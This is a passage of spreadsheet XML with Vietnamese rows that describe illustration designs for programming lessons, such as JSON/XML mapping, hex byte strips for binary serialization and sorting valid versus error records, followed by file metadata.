          <t>Con trỏ chạy trên từng ký tự của một dòng; huy hiệu trạng thái 'Trong nháy: Có/Không'; ký tự bị bỏ qua tô xám; trường hoàn tất được thả vào ô kết quả.</t>
        </is>
      </c>
      <c r="D19" s="10" t="inlineStr">
        <is>
          <t>48</t>
        </is>
      </c>
    </row>
    <row r="20" ht="28" customHeight="1" s="18">
      <c r="A20" s="15" t="inlineStr">
        <is>
          <t>H19</t>
        </is>
      </c>
      <c r="B20" s="10" t="inlineStr">
        <is>
          <t>Thẻ đối tượng ↔ JSON/XML</t>
        </is>
      </c>
      <c r="C20" s="10" t="inlineStr">
        <is>
          <t>Thẻ đối tượng bên trái, văn bản JSON/XML bên phải; đường nối màu từ mỗi thuộc tính tới phần tương ứng. JSON tô màu theo kiểu: chuỗi xanh lá, số cam, bool tím, null xám.</t>
        </is>
      </c>
      <c r="D20" s="10" t="inlineStr">
        <is>
          <t>52, 54, 55, 57, 58, 59, 60, 61</t>
        </is>
      </c>
    </row>
    <row r="21" ht="28" customHeight="1" s="18">
      <c r="A21" s="15" t="inlineStr">
        <is>
          <t>H20</t>
        </is>
      </c>
      <c r="B21" s="10" t="inlineStr">
        <is>
          <t>Dải byte nhị phân</t>
        </is>
      </c>
      <c r="C21" s="10" t="inlineStr">
        <is>
          <t>Các ô hex (16 ô/hàng) đầy dần khi ghi; mỗi trường một màu; chú thích 'Id: 4 byte', 'Name: 1 byte độ dài + 4 byte'...</t>
        </is>
      </c>
      <c r="D21" s="10" t="inlineStr">
        <is>
          <t>31, 55, 56</t>
        </is>
      </c>
    </row>
    <row r="22" ht="28" customHeight="1" s="18">
      <c r="A22" s="15" t="inlineStr">
        <is>
          <t>H21</t>
        </is>
      </c>
      <c r="B22" s="10" t="inlineStr">
        <is>
          <t>Hai thùng phân loại</t>
        </is>
      </c>
      <c r="C22" s="10" t="inlineStr">
        <is>
          <t>Hai thùng 'Hợp lệ' (thẻ xanh) và 'Lỗi' (thẻ đỏ ghi số dòng + lý do); mỗi bản ghi sau khi kiểm tra được thả vào đúng thùng.</t>
        </is>
      </c>
      <c r="D22" s="10" t="inlineStr">
        <is>
          <t>26, 29, 36, 51</t>
        </is>
      </c>
    </row>
    <row r="23" ht="28" customHeight="1" s="18">
      <c r="A23" s="15" t="inlineStr">
        <is>
          <t>H22</t>
        </is>
      </c>
      <c r="B23" s="10" t="inlineStr">
        <is>
          <t>Bảng điểm so sánh 2 cột</t>
        </is>
      </c>
      <c r="C23" s="10" t="inlineStr">
        <is>
          <t>Thanh đếm 'số bước / số lần so sánh / số chỗ phải sửa' dưới mỗi cột, cập nhật mỗi bước; bước cuối gắn cờ 'phù hợp hơn' cho cột thắng.</t>
        </is>
      </c>
      <c r="D23" s="10" t="inlineStr">
        <is>
          <t>1, 4, 7, 11, 22, 28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2026-10-14T09:32:50Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-14T10:25:49Z</dcterms:modified>
  <cp:lastModifiedBy>Tuan Anh Can</cp:lastModifiedBy>
</cp:coreProperties>
</file>